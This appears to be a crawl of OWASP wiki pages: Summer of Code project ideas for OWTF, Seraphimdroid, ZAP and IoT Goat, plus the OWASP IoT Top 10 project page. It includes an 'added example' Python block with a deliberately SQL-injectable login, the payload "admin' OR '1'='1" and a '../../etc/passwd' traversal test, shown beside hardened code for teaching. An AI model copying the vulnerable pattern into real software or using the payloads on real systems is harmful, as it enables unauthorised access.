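        tx = self.upstream(tx)
        for plugin in reversed(self.plugins):  # response phase, reverse order
            tx = plugin.on_response(tx)
        self.history.append(tx)
        return tx

    def replay(self, index: int, **changes) -> Optional[Transaction]:
        """Re-send a recorded transaction, optionally modified on the fly."""
        tx = copy.deepcopy(self.history[index])
        tx.response_status, tx.response_body = None, ""
        for attr, value in changes.items():
            setattr(tx, attr, value)
        return self.handle(tx)


def fake_upstream(tx: Transaction) -> Transaction:
    """Constructed stand-in for the target server: echoes what it received."""
    tx.response_status = 200
    tx.response_body = "%s %s ua=%s" % (tx.method, tx.url,
                                       tx.headers.get("User-Agent", "-"))
    return tx


if __name__ == "__main__":
    proxy = Proxy(fake_upstream,
                  [BlockHost("evil.example"), SessionMarker(),
                   HeaderRewriter("User-Agent", "owtf-proxy")])
    tx = proxy.handle(Transaction("GET", "http://target.example/account",
                                  {"Cookie": "session=abc123"}))
    print(tx.tags, tx.response_body)
    print(proxy.replay(0, method="POST").response_body)
```

Plugins run in list order on the way out and in reverse order on the way back, so a plugin that wraps the request (marking, rewriting) sees the matching response last; replay clones a recorded transaction rather than mutating history, so the original capture stays intact for comparison.<br />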
'''Expected results:'''<br />
*'''IMPORTANT: [http://legacy.python.org/dev/peps/pep-0008/ PEP-8 compliant code] in all modified code and surrounding areas.'''<br />
*'''IMPORTANT: [https://github.com/7a/owtf/wiki/Contributor%27s-README OWTF contributor README compliant code]'''<br />
*'''IMPORTANT: [http://sphinx-doc.org/ Sphinx-friendly python comments] [http://owtf.github.io/ptp/_modules/ptp/tools/w3af/parser.html#W3AFXMLParser example Sphinx-friendly python comments here]'''<br />
*CRITICAL: Excellent reliability<br />
*Good performance<br />
*Unit tests / Functional tests<br />
*Good documentation<br />
'''Knowledge Prerequisite:''' Python proficiency, some previous exposure to security concepts and penetration testing is welcome but not strictly necessary as long as there is will to learn.<br />
<br />
'''OWASP OWTF Mentors:''' Contact: [mailto:Abraham.Aranguren@owasp.org Abraham Aranguren][mailto:viyat.bhalodia@owasp.org Viyat Bhalodia][mailto:bharadwaj.machiraju@gmail.com Bharadwaj Machiraju] OWASP OWTF Project Leaders<br />
===OWASP OWTF - Web interface enhancements===<br />
'''Brief explanation:'''<br />
<br />
The current web interface is a mixture of Tornado Jinja templates and ReactJS. A complete UI change to a stable ReactJS-based interface should be the deliverable for this project. Most of the hard part for the change has already been done and added in a separate branch at https://github.com/owtf/owtf/tree/develop.<br />
<br />
For background on OWASP OWTF please see: https://www.owasp.org/index.php/OWASP_OWTF<br />
<br />
'''Expected results:'''<br />
*'''IMPORTANT: Clean, maintainable (ES6 compatible and using recommended design patterns) React (JavaScript) code. ([https://github.com/getsentry/zeus/tree/master/webapp This] is a good example!)'''<br />
*'''IMPORTANT: Thoroughly documented code along with API examples and example future components.'''<br />
*'''CRITICAL''': Excellent reliability and performance.<br />
*Unit tests / Functional tests and easy to setup testing environment (preferably automated).<br />
'''Knowledge Prerequisite:''' Python (reading API source code and endpoints), React.JS (high proficiency) and general JavaScript proficiency.<br />
<br />
'''OWASP OWTF Mentors:''' Contact: [mailto:Abraham.Aranguren@owasp.org Abraham Aranguren][mailto:viyat.bhalodia@owasp.org Viyat Bhalodia][mailto:bharadwaj.machiraju@gmail.com Bharadwaj Machiraju] OWASP OWTF Project Leaders<br />
===OWASP OWTF - New plugin architecture===<br />
'''Brief explanation:'''<br />
<br />
The current plugin system is not very useful and it is painful to browse the many plugins. Most of the plugins contain a lot of code and most of it is repeated, so much refactoring is needed there.<br />
<br />
This issue is documented in detail at https://github.com/owtf/owtf/issues/905.<br />
<br />
For background on OWASP OWTF please see: https://www.owasp.org/index.php/OWASP_OWTF<br />
<br />
'''Expected results:'''<br />
*'''IMPORTANT: [http://legacy.python.org/dev/peps/pep-0008/ PEP-8 compliant code] in all modified code and surrounding areas.'''<br />
*'''IMPORTANT: [https://github.com/7a/owtf/wiki/Contributor%27s-README OWTF contributor README compliant code]'''<br />
*'''IMPORTANT: [http://sphinx-doc.org/ Sphinx-friendly python comments] [http://owtf.github.io/ptp/_modules/ptp/tools/w3af/parser.html#W3AFXMLParser example Sphinx-friendly python comments here]'''<br />
*CRITICAL: Excellent reliability<br />
*Good performance<br />
*Unit tests / Functional tests<br />
*Good documentation<br />
<br />
== OWASP iGoat (draft) ==<br />
'''Idea 1:''' Completing the OWASP iGoat documentation at https://docs.igoatapp.com/ and creating demo videos for the OWASP iGoat YouTube channel for learning purposes.<br />
<br />
'''Idea 2:''' Adding a new challenge pack / CTF for iGoat. It should be a one-stop solution for learning iOS app security.<br />
<br />
== OWASP Seraphimdroid ==<br />
<br />
=== Idea 1: Anomaly detection of device state ===<br />
The idea is that certain features of a device would be constantly monitored (battery use, internet usage, app calls, etc.). Initially, the usual behaviour of the device would be learned. Later, deviations from that normal behaviour would be reported to the user. This should involve some explanation, such as which applications are causing the anomalous device behaviour.<br />
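One way to realise this learn-then-report loop, as an added example that is not Seraphimdroid code: each monitoring window is a dict of feature to per-app value, the baseline is the per-feature mean and standard deviation of the window totals, and a window that exceeds the mean by more than a chosen number of standard deviations is reported together with the app that deviates most from its own usual share. The feature names, thresholds and all the numbers in the sample windows are constructed for the illustration.<br />

```python
"""Baseline learning and anomaly reporting for monitored device features.

Added example, not Seraphimdroid code. Each monitoring window is a dict of
feature -> {app: value} (e.g. network KB or battery drain attributed to
each app). The baseline is the per-feature mean and standard deviation of
the window totals; a window whose total exceeds the mean by more than
`threshold` standard deviations is reported, together with the app that
deviates most from its own usual share. All numbers below are constructed.
"""
import statistics
from typing import Dict, List

Window = Dict[str, Dict[str, float]]


class DeviceBaseline:
    def __init__(self, threshold: float = 3.0):
        self.threshold = threshold
        self.stats: Dict[str, tuple] = {}               # feature -> (mean, stdev)
        self.app_means: Dict[str, Dict[str, float]] = {}  # feature -> {app: mean}

    def fit(self, windows: List[Window]) -> None:
        """Learn the usual behaviour from windows assumed to be clean."""
        features = {f for w in windows for f in w}
        for f in features:
            totals = [sum(w.get(f, {}).values()) for w in windows]
            mean = statistics.fmean(totals)
            stdev = statistics.pstdev(totals) or 1e-9  # constant feature: any change is huge
            self.stats[f] = (mean, stdev)
            apps = {a for w in windows for a in w.get(f, {})}
            self.app_means[f] = {
                a: statistics.fmean(w.get(f, {}).get(a, 0.0) for w in windows) for a in apps
            }

    def score(self, window: Window) -> List[Dict]:
        """Report features that are abnormally high and explain which app causes it."""
        findings = []
        for f, (mean, stdev) in self.stats.items():
            total = sum(window.get(f, {}).values())
            z = (total - mean) / stdev
            if z <= self.threshold:          # only excess usage is of interest here
                continue
            usual = self.app_means[f]
            excess = {a: v - usual.get(a, 0.0) for a, v in window.get(f, {}).items()}
            culprit = max(excess, key=excess.get)   # an unseen app has a usual share of 0
            findings.append({"feature": f, "z": round(z, 1), "observed": total,
                             "expected": round(mean, 1), "app": culprit,
                             "app_excess": round(excess[culprit], 1)})
        return findings


# Constructed clean windows: browser and mail with small drift, nothing else.
BASELINE_WINDOWS = [
    {"net_kb": {"browser": 480 + 10 * i, "mail": 95 + i},
     "battery_mah": {"browser": 40 + i, "mail": 10}}
    for i in range(10)
]
# Constructed suspicious window: a "flashlight" app suddenly moves data and drains battery.
SUSPICIOUS_WINDOW = {"net_kb": {"browser": 520, "mail": 100, "flashlight": 900},
                     "battery_mah": {"browser": 45, "mail": 10, "flashlight": 60}}
NORMAL_WINDOW = {"net_kb": {"browser": 530, "mail": 100},
                 "battery_mah": {"browser": 45, "mail": 10}}


def build_baseline() -> DeviceBaseline:
    model = DeviceBaseline(threshold=3.0)
    model.fit(BASELINE_WINDOWS)
    return model


if __name__ == "__main__":
    model = build_baseline()
    print("normal:", model.score(NORMAL_WINDOW))
    print("suspicious:", model.score(SUSPICIOUS_WINDOW))
```

Only upward deviations are reported, since the interesting cases for this idea are an app consuming more network or battery than usual; the baseline must be learned from windows believed to be clean, otherwise a malicious app that was already present becomes part of "normal".<br />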
<br />
=== Idea 2: On device machine learning of maliciousness of an app ===<br />
TensorFlow for on-device processing and some other libraries have been released that enable machine learning. We have previously applied a system that, based on permissions, is able to distinguish malicious apps from non-malicious ones. Now we would like to learn also from other outputs and things one can monitor about an application to determine whether it may be malicious.<br />
<br />
=== Idea 3: Enhancing privacy features ===<br />
The vision of Seraphimdroid is to be aware of privacy threats. This may be achieved through knowing which applications are using user accounts or other information the user has on the phone and sending it to a server, or just by knowing which applications may be doing so. The knowledge base should be extended with suggestions on how to improve privacy. Also, automated settings for various apps to use encryption should be proposed.<br />
==OWASP ZAP==<br />
[[OWASP Zed Attack Proxy Project|The OWASP Zed Attack Proxy (ZAP)]] is one of the world’s most popular free security tools and is actively maintained by hundreds of international volunteers. Previous GSoC students have implemented key parts of the ZAP core functionality and have been offered (and accepted) jobs based on their work on ZAP.<br />
<br />
=== Active Scanning WebSockets ===<br />
: '''Brief Explanation:'''<br />
: ZAP has good support for websockets, and allows them to be intercepted, changed and fuzzed. Unfortunately it doesn't currently support active scanning (automated attacking) of websocket traffic (messages).<br />
: We would like to add active scanning support to websockets, ideally in a generic way which would allow us to reuse as many of our existing rules as are relevant. Adding additional websocket specific attacks would also be very useful.<br />
: This project will be a continuation of the work that was started as part of last year's GSoC.<br />
: '''Expected Results:'''<br />
:* A pluggable infrastructure that allows us to active scan websockets<br />
:* Converting the relevant existing scan rules to work with websockets<br />
:* Implementing new websocket specific scan rules<br />
: '''Getting Started:''' <br />
:* Have a look at the ZAP [https://github.com/zaproxy/zaproxy/blob/develop/CONTRIBUTING.md CONTRIBUTING.md] file, especially the 'Coding' section.<br />
:* We like to see students who have already contributed to ZAP, so try fixing one of the bugs flagged as [https://github.com/zaproxy/zaproxy/issues?q=is%3Aopen+is%3Aissue+label%3AIdealFirstBug IdealFirstBug].<br />
: '''Knowledge Prerequisites:'''<br />
:* ZAP is written in Java, so a good knowledge of this language is recommended. Some knowledge of application security would be useful, but not essential.<br />
: '''Mentors:''' [https://www.owasp.org/index.php/User:Psiinon Simon Bennetts] [mailto:psiinon@gmail.com @] and the rest of the ZAP Core Team<br />
<br />
=== Automated Authentication Detection and Configuration ===<br />
: '''Brief Explanation:'''<br />
: Currently a user must manually configure ZAP to handle authentication, eg as per <nowiki>https://github.com/zaproxy/zaproxy/wiki/FAQformauth</nowiki><br />
: This is time consuming and error prone.<br />
: Ideally ZAP would help detect login and registration pages and provide more assistance when configuring authentication, ideally being able to completely automate the task for as many sort of webapps as possible.<br />
: This project will be a continuation of the work that was started as part of last year's GSoC.<br />
: '''Expected Results:'''<br />
:* Detect login and registration pages<br />
:* Provide a wizard to walk users through the process of setting up authentication, with as much assistance as possible<br />
:* An option to completely automate the authentication process, for as many authentication mechanisms as possible<br />
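A starting point for the first expected result, detecting login and registration pages, is to classify each form on a page by its input fields. The following is an added example and not ZAP code (ZAP itself is written in Java; this is Python using only the standard library): one password field is taken as a login form, two password fields or a "confirm" style field as a registration form, and a credential form submitted with GET is flagged. The helper names and the sample page are constructed for the illustration.<br />

```python
"""Heuristic detection of login and registration forms in an HTML page.

Added example, not ZAP code (ZAP itself is written in Java). It parses the
<form> elements of a page with the standard library and classifies each one
from its input fields: a single password field suggests a login form, two
password fields or a 'confirm' style field suggest registration. The
helper names and the sample page below are constructed for this example.
"""
from html.parser import HTMLParser
from typing import Dict, List


class FormCollector(HTMLParser):
    """Collects every <form> with its inputs (self-closing <input/> included)."""

    def __init__(self):
        super().__init__()
        self.forms: List[Dict] = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._current = {"action": attrs.get("action", ""),
                             "method": (attrs.get("method") or "get").lower(),
                             "inputs": []}
        elif tag == "input" and self._current is not None:
            self._current["inputs"].append(
                {"type": (attrs.get("type") or "text").lower(),
                 "name": (attrs.get("name") or "").lower()})

    def handle_endtag(self, tag):
        if tag == "form" and self._current is not None:
            self.forms.append(self._current)
            self._current = None


def classify_form(form: Dict) -> str:
    types = [i["type"] for i in form["inputs"]]
    names = [i["name"] for i in form["inputs"]]
    passwords = types.count("password")
    if passwords == 0:
        return "other"                      # search box, contact form, ...
    confirm = any(k in n for n in names for k in ("confirm", "repeat", "again"))
    if passwords >= 2 or confirm:
        return "registration"
    return "login"


def detect_auth_forms(html: str) -> List[Dict]:
    """Return the forms worth offering to the user in an authentication wizard."""
    parser = FormCollector()
    parser.feed(html)
    found = []
    for form in parser.forms:
        kind = classify_form(form)
        if kind == "other":
            continue
        found.append({
            "kind": kind,
            "action": form["action"],
            "method": form["method"],
            "fields": [i["name"] for i in form["inputs"]
                       if i["type"] not in ("submit", "hidden")],
            # a credential form submitted with GET leaks the password into URLs and logs
            "warnings": ["credentials submitted via GET"] if form["method"] == "get" else [],
        })
    return found


# Constructed sample page: one search form, one login form, one registration form.
SAMPLE_HTML = """
<form action="/search" method="get"><input name="q" type="text"><input type="submit"></form>
<form action="/login" method="post">
  <input type="hidden" name="csrf" value="t0k3n">
  <input type="text" name="username"><input type="password" name="password">
  <input type="submit" value="Sign in">
</form>
<form action="/register" method="post">
  <input type="email" name="email"><input type="password" name="password">
  <input type="password" name="password_confirm"><input type="submit" value="Join">
</form>
"""

if __name__ == "__main__":
    for form in detect_auth_forms(SAMPLE_HTML):
        print(form)
```

The output of detect_auth_forms is what a wizard would present to the user (action URL, method and the field names to fill in); hidden fields such as anti-CSRF tokens are kept out of the field list because they have to be fetched fresh for each login attempt rather than configured once. Forms built entirely by JavaScript after page load are not seen by a static parse like this one.<br />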
: '''Getting Started:''' <br />
:* Have a look at the ZAP [https://github.com/zaproxy/zaproxy/blob/develop/CONTRIBUTING.md CONTRIBUTING.md] file, especially the 'Coding' section.<br />
:* We like to see students who have already contributed to ZAP, so try fixing one of the bugs flagged as [https://github.com/zaproxy/zaproxy/issues?q=is%3Aopen+is%3Aissue+label%3AIdealFirstBug IdealFirstBug].<br />
: '''Knowledge Prerequisites:'''<br />
:* ZAP is written in Java, so a good knowledge of this language is recommended. Some knowledge of application security would be useful, but not essential.<br />
: '''Mentors:''' [https://www.owasp.org/index.php/User:Psiinon Simon Bennetts] [mailto:psiinon@gmail.com @] and the rest of the ZAP Core Team<br />
:<br />
<br />
== IoT Goat ==<br />
IoT Goat will be a deliberately insecure firmware based on OpenWrt. The project’s goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities will be based on the [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf IoT Top 10 2018]. <br />
<br />
===Insecure web services/application===<br />
''' Getting started '''<br />
* [https://github.com/scriptingxss/IoTGoat/blob/master/README.md Get familiar with OpenWrt]<br />
<br />
'''Expected Results:'''<br />
* Web services deployed in OpenWrt containing critical vulnerabilities showcasing the traditional IoT problems. They must contain the following vulnerabilities to be used with the IoT testing guide: SQL injection, local file inclusion and XXE injection (I1 Insecure Web Interface), insufficient authentication (I2) and transfer of sensitive information over insecure channels (I4 Lack of Transport Encryption); the numbers refer to the 2014 IoT Top 10 list.<br />
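The shape of the first two challenges, shown as an added example that is not IoT Goat code: a login check that formats user input into its SQL text (so a crafted username bypasses the password test), beside a hardened version with a parameterised query, salted hashes and a constant-time comparison, plus a path guard of the kind a local file inclusion challenge lacks. The users table, credentials, payload and paths are constructed for the illustration; IoT Goat's actual services run on OpenWrt, not in Python.<br />

```python
"""Vulnerable login check beside a hardened one, plus a safe file loader.

Added example, not IoT Goat code. It shows in Python the shape of the
challenges the section asks for: SQL injection in a login query (I1 of the
2014 list), authentication bypass through it (I2) and a local file
inclusion guard. The users table, credentials and paths are constructed.
"""
import hashlib
import hmac
import os
import sqlite3


def hash_password(password: str, salt_hex: str) -> str:
    return hashlib.pbkdf2_hmac("sha256", password.encode(),
                               bytes.fromhex(salt_hex), 100_000).hex()


def make_db() -> sqlite3.Connection:
    """In-memory database with a cleartext table (the vulnerable build) and a hashed one."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users_plain (name TEXT PRIMARY KEY, password TEXT)")
    db.execute("CREATE TABLE users (name TEXT PRIMARY KEY, pw_hash TEXT, salt TEXT)")
    for name, password in [("admin", "Sup3rS3cret!"), ("guest", "guest")]:
        salt = os.urandom(16).hex()
        db.execute("INSERT INTO users_plain VALUES (?, ?)", (name, password))
        db.execute("INSERT INTO users VALUES (?, ?, ?)",
                   (name, hash_password(password, salt), salt))
    return db


def login_vulnerable(db, name: str, password: str):
    """Deliberately vulnerable: user input is formatted straight into the SQL text."""
    query = ("SELECT name FROM users_plain WHERE name = '%s' AND password = '%s'"
             % (name, password))
    row = db.execute(query).fetchone()
    return row[0] if row else None


# AND binds tighter than OR, so the WHERE clause becomes true for the admin row
# regardless of the password value.
SQLI_PAYLOAD = "admin' OR '1'='1"


def login_hardened(db, name: str, password: str):
    """Parameterised query, salted PBKDF2 hash, constant-time comparison."""
    row = db.execute("SELECT pw_hash, salt FROM users WHERE name = ?", (name,)).fetchone()
    if row is None:
        hash_password(password, "00" * 16)   # same work for unknown users: no timing-based enumeration
        return None
    if hmac.compare_digest(hash_password(password, row[1]), row[0]):
        return name
    return None


def safe_join(base_dir: str, user_path: str):
    """Resolve a user-supplied path under base_dir; None if it escapes (LFI guard)."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, user_path))
    return target if os.path.commonpath([base, target]) == base else None


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, injected:", login_vulnerable(db, SQLI_PAYLOAD, "wrong"))
    print("hardened, injected:  ", login_hardened(db, SQLI_PAYLOAD, "wrong"))
    print("hardened, real:      ", login_hardened(db, "admin", "Sup3rS3cret!"))
    print("LFI attempt:         ", safe_join("/srv/www/pages", "../../etc/passwd"))
```

For the challenge firmware only the vulnerable half ships; the hardened half is what the accompanying testing guide should point students towards, and the cleartext users_plain table doubles as the "cleartext passwords in device memory" finding.<br />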
<br />
'''Knowledge Prerequisites:'''<br />
* OpenWRT<br />
* Web security<br />
* Embedded Security<br />
<br />
'''Potential Mentors:'''<br />
* Aaron Guzman - OWASP IoT Goat Contributor (Project leader of the IoT and Embedded AppSec project)<br />
* Fotios Chantzis - OWASP IoT Goat Contributor (and former GSoC Student/GSoc Mentor)<br />
* [[User:Calderpwn|Paulino Calderon]] - OWASP IoT Goat Contributor (and former GSoC 2011 Student/GSoc Mentor in 2015 and 2017)<br />
<br />
===Insecure services===<br />
''' Getting started '''<br />
* [https://github.com/scriptingxss/IoTGoat/blob/master/README.md Get familiar with OpenWrt]<br />
<br />
'''Expected Results:'''<br />
* Create/Install/Document network services with security vulnerabilities and insecure configurations that can be abused during the challenges.<br />
<br />
'''Knowledge Prerequisites:'''<br />
* OpenWRT<br />
* Network security<br />
<br />
'''Potential Mentors:'''<br />
* Aaron Guzman - OWASP IoT Goat Contributor (Project leader of the IoT and Embedded AppSec project)<br />
* Fotios Chantzis - OWASP IoT Goat Contributor (and former GSoC Student/GSoc Mentor)<br />
* [[User:Calderpwn|Paulino Calderon]] - OWASP IoT Goat Contributor (and former GSoC 2011 Student/GSoc Mentor in 2015 and 2017)<br />
<br />
===Insecure Android/iOS application===<br />
''' Getting started '''<br />
* [https://github.com/scriptingxss/IoTGoat/blob/master/README.md Get familiar with OpenWrt]<br />
<br />
'''Expected Results:'''<br />
* Android application containing client and server side vulnerabilities covering the OWASP TOP 10 Mobile Risks.<br />
* iOS application containing client and server side vulnerabilities covering the OWASP TOP 10 Mobile Risks.<br />
* Web Services deployed as a service in OpenWrt to be used by the Android/iOS clients.<br />
<br />
'''Knowledge Prerequisites:'''<br />
* OpenWRT<br />
* Mobile security knowledge.<br />
* Mobile/Web development knowledge.<br />
<br />
'''Potential Mentors:'''<br />
* Aaron Guzman - OWASP IoT Goat Contributor (Project leader of the IoT and Embedded AppSec project)<br />
* Fotios Chantzis - OWASP IoT Goat Contributor (and former GSoC Student/GSoc Mentor)<br />
* [[User:Calderpwn|Paulino Calderon]] - OWASP IoT Goat Contributor (and former GSoC 2011 Student/GSoc Mentor in 2015 and 2017)</div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=File:OWASP-IoT-Top-10-2018-final.pdf&diff=246272File:OWASP-IoT-Top-10-2018-final.pdf2018-12-26T04:33:42Z<p>Aaron.guzman: Aaron.guzman uploaded a new version of File:OWASP-IoT-Top-10-2018-final.pdf</p>
<hr />
<div>IoT Top 10 2018</div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=OWASP_Internet_of_Things_Project&diff=246271OWASP Internet of Things Project2018-12-26T04:30:10Z<p>Aaron.guzman: /* OWASP Internet of Things (IoT) Project */</p>
<hr />
<div>= Main =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
== OWASP Internet of Things (IoT) Project ==<br />
Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”<br />
<br />
''The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''. <br />
<br />
The project looks to define a structure for various IoT sub-projects such as Attack Surface Areas, Testing Guides and Top Vulnerabilities.<br />
<br />
==Updated!==<br />
<br />
The OWASP IoT Project for 2018 has just been released![[File:OWASP 2018 IoT Top10 Final.jpg|center|thumb|1301x1301px]]<br />
<br />
== Philosophy ==<br />
The OWASP Internet of Things Project was started in 2014 as a way help Developers, Manufacturers, Enterprises, and Consumers to make better decisions regarding the creation and use of IoT systems.<br />
<br />
This continues today with the 2018 release of the OWASP IoT Top 10, which represents the top ten things to avoid when building, deploying, or managing IoT systems. The primary theme for the 2018 OWASP Internet of Things Top 10 is simplicity. Rather than having separate lists for risks vs. threats vs. vulnerabilities—or for developers vs. enterprises vs. consumers—the project team elected to have a single, unified list that captures the top things to avoid when dealing with IoT Security.<br />
<br />
The team recognized that there are now dozens of organizations releasing elaborate guidance on IoT Security—all of which are designed for slightly different audiences and industry verticals. We thought the most useful resource we could create is a single list that addresses the highest priority issues for manufacturers, enterprises, and consumers at the same time.<br />
<br />
The result is the [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf 2018 OWASP IoT Top 10].<br />
<br />
== Methodology ==<br />
The project team is a collection of volunteer professionals from within the security industry, with experience spanning multiple areas of expertise, including: manufacturers, consulting, security testers, developers, and many more.<br />
<br />
The project was conducted in the following phases:<br />
# '''Team Formation''': finding people who would be willing to contribute to the 2018 update, both as SMEs and as project leaders to perform various tasks within the duration of the project.<br />
# '''Project Review:''' analysis of the 2014 project to determine what’s changed in the industry since that release, and how the list should be updated given those changes.<br />
# '''Data Collection''': collection and review of multiple vulnerability sources (both public and private), with special emphasis on which issues caused the most actual impact and damage.<br />
# '''Sister Project Review''': a review of dozens of other IoT Security projects to ensure that we’d not missed something major and that we were comfortable with both the content and prioritization of our release. Examples included: [https://cloudsecurityalliance.org/artifacts/csa-iot-controls-matrix/ CSA IoT Controls Matrix], [https://api.ctia.org/wp-content/uploads/2018/08/CTIA-IoT-Cybersecurity-Certification-Test-Plan-V1_0.pdf CTIA], [http://iot.stanford.edu/ Stanford’s Secure Internet of Things Project], [https://nvlpubs.nist.gov/nistpubs/ir/2018/NIST.IR.8200.pdf NISTIR 8200], [https://www.enisa.europa.eu/publications/baseline-security-recommendations-for-iot/at_download/fullReport ENISA IoT Baseline Report], [https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/747413/Code_of_Practice_for_Consumer_IoT_Security_October_2018.pdf Code of Practice for Consumer IoT Security,] and others.<br />
# '''Community Draft Feedback''': release of the draft to the community for review, including multiple Twitter calls for comments, the use of a public feedback form, and a number of public talks where feedback was gathered. The feedback was then reviewed by the team along with initial Data Collection, as well as Sister Project Review, to create the list contents and prioritization.<br />
# '''Release:''' release of the project to the public in December 2018.<br />
<br />
== The Future of the OWASP IoT Top 10 ==<br />
The team has a number of activities planned to continue improving on the project going forward.<br />
<br />
Some of the items being discussed include:<br />
* Continuing to improve the list on a two-year cadence, incorporating feedback from the community and from additional project contributors to ensure we are staying current with issues facing the industry.<br />
* Mapping the list items to other OWASP projects, such as the ASVS, and perhaps to other projects outside OWASP as well.<br />
* Expanding the project into other aspects of IoT—including embedded security, ICS/ SCADA,etc.<br />
* Adding use and abuse cases, with multiple examples, to solidify each concept discussed.<br />
* Considering the addition of reference architectures, so we can not only tell people what to avoid, but how to do what they need to do securely.<br />
<br />
Participation in the OWASP IoT Project is open to the community. We take input from all participants — whether you’re a developer, a manufacturer, a penetration tester, or someone just trying to implement IoT securely. You can find the team meeting every other Friday in the #iot-security room of the OWASP Slack Channel.<br />
<br />
'''''The OWASP IoT Security Team, 2018'''''<br />
<br />
==Licensing==<br />
The OWASP Internet of Things Project is free to use. It is licensed under the [http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the OWASP Internet of Things Project? ==<br />
<br />
The OWASP Internet of Things Project provides information on:<br />
<br />
* [https://www.owasp.org/index.php/IoT_Attack_Surface_Areas IoT Attack Surface Areas]<br />
* IoT Vulnerabilities<br />
* Firmware Analysis<br />
* ICS/SCADA Software Weaknesses<br />
* Community Information<br />
* [https://www.owasp.org/index.php/IoT_Testing_Guides IoT Testing Guides]<br />
* [https://www.owasp.org/index.php/IoT_Security_Guidance IoT Security Guidance]<br />
* [https://www.owasp.org/index.php/Principles_of_IoT_Security Principles of IoT Security]<br />
* [https://www.owasp.org/index.php/IoT_Framework_Assessment IoT Framework Assessment]<br />
* Developer, Consumer and Manufacturer Guidance<br />
* Design Principles<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
* Vishruta Rudresh<br />
* Aaron Guzman<br />
<br />
== Contributors ==<br />
* [https://www.owasp.org/index.php/User:Justin_C._Klein_Keane Justin Klein Keane]<br />
* Saša Zdjelar<br />
<br />
== IoT Top 2018 Contributors ==<br />
* Vijayamurugan Pushpanathan <br />
* Alexander Lafrenz <br />
* Masahiro Murashima <br />
* Charlie Worrell <br />
* José A. Rivas (jarv) <br />
* Pablo Endres <br />
* Ade Yoseman <br />
* Cédric Lévy-Bencheton<br />
* Jason Andress<br />
* Amélie Didion - Designer<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Project|OWASP Project Repository]]<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security]<br />
* [https://www.owasp.org/index.php/C-Based_Toolchain_Hardening OWASP C-based Toolchain Hardening]<br />
<br />
| style="padding-left:25px;width:200px;" valign="top" |<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The OWASP Slack Channel]<br />
<br />
Hint: If you're new to Slack, [https://lists.owasp.org/pipermail/owasp-community/2015-July/000703.html join OWASP's slack channel first], then join #iot-security within OWASP's channel.<br />
<br />
== Quick Download ==<br />
[https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top Ten 2018]<br />
<br />
[https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
<br />
[https://www.owasp.org/images/7/7b/IoT_Preso_v1.pptx Quick discussion on IoT]<br />
<br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping DEFCON 23]<br />
<br />
[https://www.owasp.org/images/2/2d/Iot_testing_methodology.JPG IoT Testing Guidance Handout]<br />
<br />
[https://www.owasp.org/images/7/71/Internet_of_Things_Top_Ten_2014-OWASP.pdf OWASP IoT Top Ten PDF]<br />
<br />
[https://www.owasp.org/images/8/8e/Infographic-v1.jpg OWASP IoT Top Ten Infographic]<br />
<br />
[https://www.owasp.org/images/0/01/Internet_of_Things_Top_Ten_2014-OWASP-ppt.pptx OWASP IoT Top Ten PPT]<br />
<br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf OWASP IoT Top Ten-RSA 2015]<br />
<br />
[https://www.owasp.org/images/b/bd/OWASP-IoT.pptx OWASP IoT Project Overview]<br />
<br />
== News and Events ==<br />
* [https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
* Added a [https://owasp-iot-security.slack.com/ Slack channel]<br />
* Added a sub-project; [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Security_Policy_Project IoT Security Policy Project]<br />
* Daniel Miessler gave his [https://www.youtube.com/watch?v=RhxHHD790nw IoT talk at DEFCON 23]<br />
* Migrating the IoT Top Ten to be under the IoT Project<br />
* HP Study Reveals 70 Percent of Internet of Things Devices Vulnerable to Attack<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" width="50%" valign="top" align="center" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| width="50%" valign="top" align="center" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| width="50%" valign="top" align="center" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
